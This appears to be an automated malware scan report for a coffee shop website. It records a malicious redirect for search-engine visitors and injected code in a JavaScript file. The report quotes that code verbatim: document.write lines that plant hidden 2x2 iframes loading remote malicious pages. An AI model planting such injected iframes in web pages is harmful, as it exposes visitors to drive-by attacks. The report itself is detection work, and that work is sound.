Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://tinshedcoffee.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: tinshedcoffee.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 05 Jul 2014 22:29:10 GMT Location: http://islam-news.ru/oczf.html?h=616041 Server: Apache Content-Length: 223 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://tinshedcoffee.com/ | 200 OK Content-Length: 3148 Content-Type: text/html | clean |
http://tinshedcoffee.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 22338 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=616041></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=616041></iframe>'); var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", win = window, doc = document, nav = navigator, ...[19531 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=616041></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=616041></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://islam-news.ru/oczf.html?i=616041></iframe> Hidden iFrame found. size: 2x2 src: http://islam-news.ru/oczf.html?i=616041 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://islam-news.ru/oczf.html?i=616041> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=616041 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=616041> Hidden iFrame found. size: 2x2 src: http://ccselecta.it/hwed.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=616041 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=616041> | ||
http://tinshedcoffee.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tinshedcoffee.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tinshedcoffee.com/
Result: tinshedcoffee.com is not infected or malware details are not published yet.
Result: tinshedcoffee.com is not infected or malware details are not published yet.